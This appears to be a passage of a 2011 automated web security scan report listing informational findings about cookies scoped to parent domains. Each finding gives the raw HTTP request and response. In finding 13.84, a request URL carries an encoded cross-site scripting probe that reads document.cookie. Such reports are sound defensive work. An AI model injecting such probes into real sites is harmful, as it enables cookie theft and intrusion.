Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=47fa77d95684576f:TM=1295881311:LM=1295881311:S=7WF0WTQQYZ1xaMCz; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.76. http://books.google.com/bkshp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/bkshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:52 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

13.77. http://books.google.com/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/books

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:54 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

13.78. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2150004&PluID=0&ord=1295907707715&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 24 Jan 2011 22:21:02 GMT
Connection: close

13.79. http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/OzoDB/cutils/R52_9/jsc/305/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/305/egc.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1041103803 1040114911
Cache-Control: max-age=996206
Expires: Sat, 05 Feb 2011 11:13:55 GMT
Date: Mon, 24 Jan 2011 22:30:29 GMT
Connection: close

13.80. http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/c5/jsc/gl.js HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFgeo=5386156; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;
ETag: "91bd5740-5d7-4988a5ba08d40"
Vary: Accept-Encoding
X-Varnish: 1882666809
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=283434
Expires: Fri, 28 Jan 2011 04:38:41 GMT
Date: Mon, 24 Jan 2011 21:54:47 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';

if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

13.81. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

13.82. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=Xy0hOcdtU4s&offerid=145238.1405647&type=2&subid=0 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
Set-Cookie: lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
Set-Cookie: lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 24 Jan 2011 15:01:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://memberservices.informit.com/affiliates/gateway.ashx?siteID=Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg&url=http%3A%2F%2Fwww.informit.com%2Fstore%2Fproduct.aspx%3Fisbn%3D0321704215
Content-Length: 0
Connection: close

13.83. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...

13.84. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
rdrlst=20s0so2ylebnns0000000f0o01050110e7dpletz4d0000000b0o01050110bmmnlebnns0000000f0o01050110e10rlfjpei000000010o010501101x1blebnns0000000f0o01050110exo1lebnns0000000f0o01050110eeh5lf17qf000000070o0105011076bylemlne0000000d0o01050110dw3clebnns0000000f0o01050110e7gmlebnns0000000f0o01050110ejv6lebnns0000000f0o01050110ej4ilew2e2000000090o010501109xthlebnns0000000f0o01050110efullf8gij000000030o010501103jillebnns0000000f0o01050110efuqlegh2b0000000e0o01050110eb6mlf17qk000000060o010501106mz1lebnns0000000f0o01050110ep7vlebnns0000000f0o01050110exvslebnns0000000f0o01050110exuklebnns0000000f0o01050110ex1jlebnns0000000f0o01050110ejk7lebnns0000000f0o01050110eyiplebnns0000000f0o01050110exwflebnns0000000f0o01050110eyh0lebnns0000000f0o01050110ee4vlebnns0000000f0o01050110exwblebnns0000000f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000050o01050110582gletz4d0pqa500a0l000400100ag2leqh190t8d900c0o01050110c82hlebnns181qq00f0o01050110e9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000010o010501101820lebnns181qq00e0l000400100b0olfjpei000000010o010501101ab4lebnns181qq00f0o01050110e9szlebnns181qq00f0o01050110e8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b138c700e0o01050110eal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000010o0105011018bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000010o01050110140slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000020o01050110240uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2fscript%253E7a00ceef170%26SE%3d3%26r%3d1 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=015020a0e0f0g1lebnnsxzt1ibglxzt1wsurxzt1wsurxzt1wsur; ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=3lebnns020r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z1l024fhux122p000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000004esx7120104tej; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv129yk00e0l01040210d; rdrlst=20r0s7dpletz4d0000000a0l01040210ao2ylebnns0000000e0l01040210dmmnlebnns0000000e0l01040210dxo1lebnns0000000e0l01040210dx1blebnns0000000e0l01040210deh5lf17qf000000060l0104021066bylemlne0000000c0l01040210cw3clebnns0000000e0l01040210d7gmlebnns0000000e0l01040210djv6lebnns0000000e0l01040210dj4ilew2e2000000080l010402108xthlebnns0000000e0l01040210dfullf8gij000000020l010402102jillebnns0000000e0l01040210dfuqlegh2b0000000d0l01040210db6mlf17qk000000050l010402105mz1lebnns0000000e0l01040210dp7vlebnns0000000e0l01040210dxvslebnns0000000e0l01040210dxuklebnns0000000e0l01040210dx1jlebnns0000000e0l01040210djk7lebnns0000000e0l01040210dyiplebnns0000000e0l01040210dxwflebnns0000000e0l01040210dyh0lebnns0000000e0l01040210de4vlebnns0000000e0l01040210dxwblebnns0000000e0l01040210d; sglst=2100s8dtletz4d0000000a0l01040210aa70lebnns0000000e0l01040210d61gletz4d0000000a0l01040210a5b0lf17qo000000040l010402104ag2leqh190hzha00b0l01040210b82gletz4d0000000a0l01040210a9zdlebnns0ibgl00e0l01040210d82hlebnns0000000e0l01040210d5q7letz4d0000000a0l01040210aa6slebnns0ibgl00e0l01040210dachlebnns0000000e0l01040210d7x9lebnns0000000e0l01040210d820lebnns0000000e0l01040210dab4lebnns0ibgl00e0l01040210d9szlebnns0ibgl00e0l01040210d8wklebnns0ibgl00e0l01040210d923lebnns0ibgl00e0l01040210dahllebnns0000000e0l01040210d0tllegh2b0xgk100d0l01040210dal1letz4d0000000a0l01040210a8lllebnns0000000e0l01040210dabulebnns0000000e0l01040210d8bgletz4d0000000a0l01040210a7y2lebnns0000000e0l01040210d5q8lebnns0000000e0l01040210d40slebnns0000000e0l01040210d45mlfdxmc000000010l010401101a97lebnns0000000e0l01040210dah4lebnns0000000e0l01040210d3s4letz4d0000000a0l01040210a40uletz4d0000000a0l01040210aacdlebnns0000000e0l01040210daanlebnns0000000e0l01040210d9atlebnns0000000e0l01040210d86zlebnns0000000e0l01040210dac3letz4d0000000a0l01040210a

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=20s0so2ylebnns0000000f0o01050110e7dpletz4d0000000b0o01050110bmmnlebnns0000000f0o01050110e10rlfjpei000000010o010501101x1blebnns0000000f0o01050110exo1lebnns0000000f0o01050110eeh5lf17qf000000070o0105011076bylemlne0000000d0o01050110dw3clebnns0000000f0o01050110e7gmlebnns0000000f0o01050110ejv6lebnns0000000f0o01050110ej4ilew2e2000000090o010501109xthlebnns0000000f0o01050110efullf8gij000000030o010501103jillebnns0000000f0o01050110efuqlegh2b0000000e0o01050110eb6mlf17qk000000060o010501106mz1lebnns0000000f0o01050110ep7vlebnns0000000f0o01050110exvslebnns0000000f0o01050110exuklebnns0000000f0o01050110ex1jlebnns0000000f0o01050110ejk7lebnns0000000f0o01050110eyiplebnns0000000f0o01050110exwflebnns0000000f0o01050110eyh0lebnns0000000f0o01050110ee4vlebnns0000000f0o01050110exwblebnns0000000f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000050o01050110582gletz4d0pqa500a0l000400100ag2leqh190t8d900c0o01050110c82hlebnns181qq00f0o01050110e9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000010o010501101820lebnns181qq00e0l000400100b0olfjpei000000010o010501101ab4lebnns181qq00f0o01050110e9szlebnns181qq00f0o01050110e8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b138c700e0o01050110eal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000010o0105011018bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000010o01050110140slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000020o01050110240uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
